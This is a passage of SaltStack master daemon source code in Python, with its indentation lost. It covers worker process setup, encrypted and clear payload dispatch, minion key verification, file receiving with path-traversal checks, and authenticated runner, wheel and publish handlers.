# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts["worker_threads"]) != 1:
log.warning(
"TCP transport supports only 1 worker on Windows "
"when using Python 2."
)
self.opts["worker_threads"] = 1
if self.opts["req_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting ReqServer_ProcessManager niceness to %d",
self.opts["req_server_niceness"],
)
os.nice(self.opts["req_server_niceness"])
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts["worker_threads"])):
name = "MWorker-{}".format(ind)
self.process_manager.add_process(
MWorker,
args=(self.opts, self.master_key, self.key, req_channels, name),
kwargs=kwargs,
name=name,
)
self.process_manager.run()
def run(self):
"""
Start up the ReqServer
"""
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, "process_manager"):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
class MWorker(salt.utils.process.SignalHandlingProcess):
"""
The worker multiprocess instance to manage the backend operations for the
salt master.
"""
def __init__(self, opts, mkey, key, req_channels, name, **kwargs):
"""
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
"""
kwargs["name"] = name
self.name = name
super().__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {"mean": 0, "runs": 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
super().__init__(
log_queue=state["log_queue"], log_queue_level=state["log_queue_level"]
)
self.opts = state["opts"]
self.req_channels = state["req_channels"]
self.mkey = state["mkey"]
self.key = state["key"]
self.k_mtime = state["k_mtime"]
SMaster.secrets = state["secrets"]
def __getstate__(self):
return {
"opts": self.opts,
"req_channels": self.req_channels,
"mkey": self.mkey,
"key": self.key,
"k_mtime": self.k_mtime,
"secrets": SMaster.secrets,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, "req_channels", ()):
channel.close()
super()._handle_signals(signum, sigframe)
def __bind(self):
"""
Bind to the local port
"""
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(
self._handle_payload, io_loop=self.io_loop
) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@salt.ext.tornado.gen.coroutine
def _handle_payload(self, payload):
"""
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload route to the appropriate handler
"""
key = payload["enc"]
load = payload["load"]
ret = {"aes": self._handle_aes, "clear": self._handle_clear}[key](load)
raise salt.ext.tornado.gen.Return(ret)
def _post_stats(self, start, cmd):
"""
Calculate the master stats and fire events with stat info
"""
end = time.time()
duration = end - start
self.stats[cmd]["mean"] = (
self.stats[cmd]["mean"] * (self.stats[cmd]["runs"] - 1) + duration
) / self.stats[cmd]["runs"]
if end - self.stat_clock > self.opts["master_stats_event_iter"]:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event(
{
"time": end - self.stat_clock,
"worker": self.name,
"stats": self.stats,
},
tagify(self.name, "stats"),
)
self.stats = collections.defaultdict(lambda: {"mean": 0, "runs": 0})
self.stat_clock = end
def _handle_clear(self, load):
"""
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
"""
log.trace("Clear payload received with command %s", load["cmd"])
cmd = load["cmd"]
method = self.clear_funcs.get_method(cmd)
if not method:
return {}, {"fun": "send_clear"}
if self.opts["master_stats"]:
start = time.time()
self.stats[cmd]["runs"] += 1
ret = method(load), {"fun": "send_clear"}
if self.opts["master_stats"]:
self._post_stats(start, cmd)
return ret
def _handle_aes(self, data):
"""
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
"""
if "cmd" not in data:
log.error("Received malformed command %s", data)
return {}
cmd = data["cmd"]
log.trace("AES payload received with command %s", data["cmd"])
method = self.aes_funcs.get_method(cmd)
if not method:
return {}, {"fun": "send"}
if self.opts["master_stats"]:
start = time.time()
self.stats[cmd]["runs"] += 1
def run_func(data):
return self.aes_funcs.run_func(data["cmd"], data)
with StackContext(
functools.partial(RequestContext, {"data": data, "opts": self.opts})
):
ret = run_func(data)
if self.opts["master_stats"]:
self._post_stats(start, cmd)
return ret
def run(self):
"""
Start a Master Worker
"""
salt.utils.process.appendproctitle(self.name)
# if we inherit req_server level without our own, reset it
if not salt.utils.platform.is_windows():
enforce_mworker_niceness = True
if self.opts["req_server_niceness"]:
if salt.utils.user.get_user() == "root":
log.info(
"%s decrementing inherited ReqServer niceness to 0", self.name
)
log.info(os.nice())
os.nice(-1 * self.opts["req_server_niceness"])
else:
log.error(
"%s unable to decrement niceness for MWorker, not running as root",
self.name,
)
enforce_mworker_niceness = False
# else set what we're explicitly asked for
if enforce_mworker_niceness and self.opts["mworker_niceness"]:
log.info(
"setting %s niceness to %i",
self.name,
self.opts["mworker_niceness"],
)
os.nice(self.opts["mworker_niceness"])
self.clear_funcs = ClearFuncs(self.opts, self.key,)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
class TransportMethods:
"""
Expose methods to the transport layer, methods with their names found in
the class attribute 'expose_methods' will be exposed to the transport layer
via 'get_method'.
"""
expose_methods = ()
def get_method(self, name):
"""
Get a method which should be exposed to the transport layer
"""
if name in self.expose_methods:
try:
return getattr(self, name)
except AttributeError:
log.error("Requested method not exposed: %s", name)
else:
log.error("Requested method not exposed: %s", name)
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(TransportMethods):
"""
Set up functions that are available when the load is encrypted with AES
"""
expose_methods = (
"verify_minion",
"_master_tops",
"_ext_nodes",
"_master_opts",
"_mine_get",
"_mine",
"_mine_delete",
"_mine_flush",
"_file_recv",
"_pillar",
"_minion_event",
"_handle_minion_event",
"_return",
"_syndic_return",
"minion_runner",
"pub_ret",
"minion_pub",
"minion_publish",
"revoke_auth",
"_serve_file",
"_file_find",
"_file_hash",
"_file_hash_and_stat",
"_file_list",
"_file_list_emptydirs",
"_dir_list",
"_symlink_list",
"_file_envs",
)
def __init__(self, opts):
"""
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
"""
self.opts = opts
self.event = salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts["conf_file"])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts, states=False, rend=False, ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
"""
Set the local file objects from the file server interface
"""
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
"""
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
"""
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts["pki_dir"], "minions", id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except OSError:
log.warning(
"Salt minion claiming to be %s attempted to communicate with "
"master, but key could not be read and verification was denied.",
id_,
)
return False
except (ValueError, IndexError, TypeError) as err:
log.error('Unable to load public key "%s": %s', pub_path, err)
try:
if salt.crypt.public_decrypt(pub, token) == b"salt":
return True
except ValueError as err:
log.error("Unable to decrypt token: %s", err)
log.error(
"Salt minion claiming to be %s has attempted to communicate with "
"the master and could not be verified",
id_,
)
return False
def verify_minion(self, id_, token):
"""
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
"""
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
"""
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
"""
# Verify that the load is valid
if "peer" not in self.opts:
return False
if not isinstance(self.opts["peer"], dict):
return False
if any(
key not in clear_load for key in ("fun", "arg", "tgt", "ret", "tok", "id")
):
return False
# If the command will make a recursive publish don't run
if clear_load["fun"].startswith("publish."):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load["id"], clear_load["tok"]):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
"Minion id %s is not who it says it is and is attempting "
"to issue a peer command",
clear_load["id"],
)
return False
clear_load.pop("tok")
perms = []
for match in self.opts["peer"]:
if re.match(match, clear_load["id"]):
# This is the list of funcs/modules!
if isinstance(self.opts["peer"][match], list):
perms.extend(self.opts["peer"][match])
if "," in clear_load["fun"]:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load["fun"] = clear_load["fun"].split(",")
arg_ = []
for arg in clear_load["arg"]:
arg_.append(arg.split())
clear_load["arg"] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load["fun"],
clear_load["arg"],
clear_load["tgt"],
clear_load.get("tgt_type", "glob"),
publish_validate=True,
)
def __verify_load(self, load, verify_keys):
"""
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
:rtype: bool
:rtype: dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
"""
if any(key not in load for key in verify_keys):
return False
if "tok" not in load:
log.error(
"Received incomplete call from %s for '%s', missing '%s'",
load["id"],
inspect_stack()["co_name"],
"tok",
)
return False
if not self.__verify_minion(load["id"], load["tok"]):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning("Minion id %s is not who it says it is!", load["id"])
return False
if "tok" in load:
load.pop("tok")
return load
def _master_tops(self, load):
"""
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
"""
load = self.__verify_load(load, ("id", "tok"))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
"""
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
"""
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts["file_roots"] = file_roots
mopts["top_file_merging_strategy"] = self.opts["top_file_merging_strategy"]
mopts["env_order"] = self.opts["env_order"]
mopts["default_top"] = self.opts["default_top"]
if load.get("env_only"):
return mopts
mopts["renderer"] = self.opts["renderer"]
mopts["failhard"] = self.opts["failhard"]
mopts["state_top"] = self.opts["state_top"]
mopts["state_top_saltenv"] = self.opts["state_top_saltenv"]
mopts["nodegroups"] = self.opts["nodegroups"]
mopts["state_auto_order"] = self.opts["state_auto_order"]
mopts["state_events"] = self.opts["state_events"]
mopts["state_aggregate"] = self.opts["state_aggregate"]
mopts["jinja_env"] = self.opts["jinja_env"]
mopts["jinja_sls_env"] = self.opts["jinja_sls_env"]
mopts["jinja_lstrip_blocks"] = self.opts["jinja_lstrip_blocks"]
mopts["jinja_trim_blocks"] = self.opts["jinja_trim_blocks"]
return mopts
def _mine_get(self, load):
"""
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
"""
load = self.__verify_load(load, ("id", "tgt", "fun", "tok"))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
"""
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
"""
load = self.__verify_load(load, ("id", "data", "tok"))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
"""
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
"""
load = self.__verify_load(load, ("id", "fun", "tok"))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
"""
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
"""
load = self.__verify_load(load, ("id", "tok"))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
"""
Allows minions to send files to the master, files are sent to the
master file cache
"""
if any(key not in load for key in ("id", "path", "loc")):
return False
if not isinstance(load["path"], list):
return False
if not self.opts["file_recv"]:
return False
if not salt.utils.verify.valid_id(self.opts, load["id"]):
return False
file_recv_max_size = 1024 * 1024 * self.opts["file_recv_max_size"]
if "loc" in load and load["loc"] < 0:
log.error("Invalid file pointer: load[loc] < 0")
return False
if len(load["data"]) + load.get("loc", 0) > file_recv_max_size:
log.error(
"file_recv_max_size limit of %d MB exceeded! %s will be "
"truncated. To successfully push this file, adjust "
"file_recv_max_size to an integer (in MB) large enough to "
"accommodate it.",
file_recv_max_size,
load["path"],
)
return False
if "tok" not in load:
log.error(
"Received incomplete call from %s for '%s', missing '%s'",
load["id"],
inspect_stack()["co_name"],
"tok",
)
return False
if not self.__verify_minion(load["id"], load["tok"]):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning("Minion id %s is not who it says it is!", load["id"])
return {}
load.pop("tok")
# Join path
sep_path = os.sep.join(load["path"])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# have been normalized.
if os.path.isabs(normpath) or "../" in load["path"]:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts["cachedir"], "minions", load["id"], "files", normpath
)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts["cachedir"]):
log.warning(
"Attempt to write received file outside of master cache "
"directory! Requested path: %s. Access denied.",
cpath,
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load["loc"] != 0:
mode = "ab"
else:
mode = "wb"
with salt.utils.files.fopen(cpath, mode) as fp_:
if load["loc"]:
fp_.seek(load["loc"])
fp_.write(salt.utils.stringutils.to_bytes(load["data"]))
return True
def _pillar(self, load):
"""
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
"""
if any(key not in load for key in ("id", "grains")):
return False
if not salt.utils.verify.valid_id(self.opts, load["id"]):
return False
load["grains"]["id"] = load["id"]
pillar = salt.pillar.get_pillar(
self.opts,
load["grains"],
load["id"],
load.get("saltenv", load.get("env")),
ext=load.get("ext"),
pillar_override=load.get("pillar_override", {}),
pillarenv=load.get("pillarenv"),
extra_minion_data=load.get("extra_minion_data"),
)
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get("minion_data_cache", False):
self.masterapi.cache.store(
"minions/{}".format(load["id"]),
"data",
{"grains": load["grains"], "pillar": data},
)
if self.opts.get("minion_data_cache_events") is True:
self.event.fire_event(
{"Minion data cache refresh": load["id"]},
tagify(load["id"], "refresh", "minion"),
)
return data
def _minion_event(self, load):
"""
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
"""
load = self.__verify_load(load, ("id", "tok"))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
"""
Act on specific events from minions
"""
id_ = load["id"]
if load.get("tag", "") == "_salt_error":
log.error(
"Received minion error from [%s]: %s", id_, load["data"]["message"]
)
for event in load.get("events", []):
event_data = event.get("data", {})
if "minions" in event_data:
jid = event_data.get("jid")
if not jid:
continue
minions = event_data["minions"]
try:
salt.utils.job.store_minions(
self.opts, jid, minions, mminion=self.mminion, syndic_id=id_
)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
"Could not add minion(s) %s for job %s: %s", minions, jid, exc
)
def _return(self, load):
"""
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
"""
if self.opts["require_minion_sign_messages"] and "sig" not in load:
log.critical(
"_return: Master is requiring minions to sign their "
"messages, but there is no signature in this payload from "
"%s.",
load["id"],
)
return False
if "sig" in load:
log.trace("Verifying signed event publish from minion")
sig = load.pop("sig")
this_minion_pubkey = os.path.join(
self.opts["pki_dir"], "minions/{}".format(load["id"])
)
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(
this_minion_pubkey, serialized_load, sig
):
log.info("Failed to verify event signature from minion %s.", load["id"])
if self.opts["drop_messages_signature_fail"]:
log.critical(
"drop_messages_signature_fail is enabled, dropping "
"message from %s",
load["id"],
)
return False
else:
log.info(
"But 'drop_message_signature_fail' is disabled, so message is still accepted."
)
load["sig"] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion
)
except salt.exceptions.SaltCacheError:
log.error("Could not store job information for load: %s", load)
def _syndic_return(self, load):
"""
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
"""
loads = load.get("load")
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ("return", "jid", "id")):
continue
# if we have a load, save it
if load.get("load"):
fstr = "{}.save_load".format(self.opts["master_job_cache"])
self.mminion.returners[fstr](load["jid"], load["load"])
# Register the syndic
syndic_cache_path = os.path.join(
self.opts["cachedir"], "syndics", load["id"]
)
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, "w") as wfh:
wfh.write("")
# Format individual return loads
for key, item in load["return"].items():
ret = {"jid": load["jid"], "id": key}
ret.update(item)
if "master_id" in load:
ret["master_id"] = load["master_id"]
if "fun" in load:
ret["fun"] = load["fun"]
if "arg" in load:
ret["fun_args"] = load["arg"]
if "out" in load:
ret["out"] = load["out"]
if "sig" in load:
ret["sig"] = load["sig"]
self._return(ret)
def minion_runner(self, clear_load):
"""
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
"""
load = self.__verify_load(clear_load, ("fun", "arg", "id", "tok"))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
"""
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
"""
load = self.__verify_load(load, ("jid", "id", "tok"))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(self.opts["cachedir"], "publish_auth")
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, str(load["jid"]))
with salt.utils.files.fopen(jid_fn, "r") as fp_:
if not load["id"] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load["jid"])
def minion_pub(self, clear_load):
"""
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion pay
"""
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
"""
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
.. code-block:: bash
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
"""
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
"""
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict
:return: If the load is invalid, it may be returned. No key operation is performed.
:rtype: bool
:return: True if key was revoked, False if not
"""
load = self.__verify_load(load, ("id", "tok"))
if not self.opts.get("allow_minion_key_revoke", False):
log.warning(
"Minion %s requested key revoke, but allow_minion_key_revoke "
"is set to False",
load["id"],
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
"""
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
"""
# Don't honor private functions
if func.startswith("__"):
# TODO: return some error? Seems odd to return {}
return {}, {"fun": "send"}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
"Master function call %s took %s seconds", func, time.time() - start
)
except Exception: # pylint: disable=broad-except
ret = ""
log.error("Error in function %s:\n", func, exc_info=True)
else:
log.error(
"Received function %s which is unavailable on the master, "
"returning False",
func,
)
return False, {"fun": "send"}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == "_return":
return ret, {"fun": "send"}
if func == "_pillar" and "id" in load:
if load.get("ver") != "2" and self.opts["pillar_version"] == 1:
# Authorized to return old pillar proto
return ret, {"fun": "send"}
return ret, {"fun": "send_private", "key": "pillar", "tgt": load["id"]}
# Encrypt the return
return ret, {"fun": "send"}
class ClearFuncs(TransportMethods):
"""
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
"""
# These methods will be exposed to the transport layer by
# MWorker._handle_clear
expose_methods = (
"ping",
"publish",
"get_token",
"mk_token",
"wheel",
"runner",
)
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
)
# Make a client
self.local = salt.client.get_local_client(self.opts["conf_file"])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts, states=False, rend=False, ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
"""
Send a master control function back to the runner system
"""
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get("error")
if error:
# Authentication error occurred: do not continue.
return {"error": error}
# Authorize
username = auth_check.get("username")
if auth_type != "user":
runner_check = self.ckminions.runner_check(
auth_check.get("auth_list", []),
clear_load["fun"],
clear_load.get("kwarg", {}),
)
if not runner_check:
return {
"error": {
"name": err_name,
"message": 'Authentication failure of type "{}" occurred for '
"user {}.".format(auth_type, username),
}
}
elif isinstance(runner_check, dict) and "error" in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if "user" in clear_load:
username = clear_load["user"]
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get("user", "root")
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop("fun")
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(
fun, clear_load.get("kwarg", {}), username, local=True
)
except Exception as exc: # pylint: disable=broad-except
log.error("Exception occurred while introspecting %s: %s", fun, exc)
return {
"error": {
"name": exc.__class__.__name__,
"args": exc.args,
"message": str(exc),
}
}
def wheel(self, clear_load):
"""
Send a master control function back to the wheel system
"""
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get("error")
if error:
# Authentication error occurred: do not continue.
return {"error": error}
# Authorize
username = auth_check.get("username")
if auth_type != "user":
wheel_check = self.ckminions.wheel_check(
auth_check.get("auth_list", []),
clear_load["fun"],
clear_load.get("kwarg", {}),
)
if not wheel_check:
return {
"error": {
"name": err_name,
"message": 'Authentication failure of type "{}" occurred for '
"user {}.".format(auth_type, username),
}
}
elif isinstance(wheel_check, dict) and "error" in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if "user" in clear_load:
username = clear_load["user"]
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get("user", "root")
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop("fun")
tag = tagify(jid, prefix="wheel")
data = {
"fun": "wheel.{}".format(fun),
"jid": jid,
"tag": tag,
"user": username,
}
self.event.fire_event(data, tagify([jid, "new"], "wheel"))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data["return"] = ret["return"]
data["success"] = ret["success"]
self.event.fire_event(data, tagify([jid, "ret"], "wheel"))
return {"tag": tag, "data": data}
except Exception as exc: # pylint: disable=broad-except
log.error("Exception occurred while introspecting %s: %s", fun, exc)
data["return"] = "Exception occurred in wheel {}: {}: {}".format(
fun, exc.__class__.__name__, exc,
)
data["success"] = False
self.event.fire_event(data, tagify([jid, "ret"], "wheel"))
return {"tag": tag, "data": data}
def mk_token(self, clear_load):
"""
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
"""
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ""
return token
def get_token(self, clear_load):
"""
Return the name associated with a token or False if the token is invalid
"""
if "token" not in clear_load:
return False
return self.loadauth.get_tok(clear_load["token"])
def publish(self, clear_load):
"""
This method sends out publications to the minions, it can only be used
by the LocalClient.
"""
extra = clear_load.get("kwargs", {})
publisher_acl = salt.acl.PublisherACL(self.opts["publisher_acl_blacklist"])
if publisher_acl.user_is_blacklisted(
clear_load["user"]
) or publisher_acl.cmd_is_blacklisted(clear_load["fun"]):
log.error(
"%s does not have permissions to run %s. Please contact "
"your local administrator if you believe this is in "
"error.\n",
clear_load["user"],
clear_load["fun"],
)
return {
"error": {
"name": "AuthorizationError",
"message": "Authorization error occurred.",
}
}
# Retrieve the minions list
delimiter = clear_load.get("kwargs", {}).get("delimiter", DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load["tgt"], clear_load.get("tgt_type", "glob"), delimiter
)
minions = _res.get("minions", list())
missing = _res.get("missing", list())
ssh_minions = _res.get("ssh_minions", False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == "user":
auth_check = self.loadauth.check_authentication(
clear_load, auth_type, key=key
)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get("auth_list", [])
err_msg = 'Authentication failure of type "{}" occurred.'.format(auth_type)
if auth_check.get("error"):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {
"error": {
"name": "AuthenticationError",
"message": "Authentication error occurred.",
}
}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != "user" or (auth_type == "user" and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load["fun"],
clear_load["arg"],
clear_load["tgt"],
clear_load.get("tgt_type", "glob"),
minions=minions,
# always accept find_job
whitelist=["saltutil.find_job"],
)
if not authorized:
# Authorization error occurred. Do not continue.
if (
auth_type == "eauth"
and not auth_list
and "username" in extra
and "eauth" in extra
):
log.debug(
'Auth configuration for eauth "%s" and user "%s" is empty',
extra["eauth"],
extra["username"],
)
log.warning(err_msg)
return {
"error": {
"name": "AuthorizationError",
"message": "Authorization error occurred.",
}
}
# Perform some specific auth_type tasks after the authorization check
if auth_type == "token":
username = auth_check.get("username")
clear_load["user"] = username
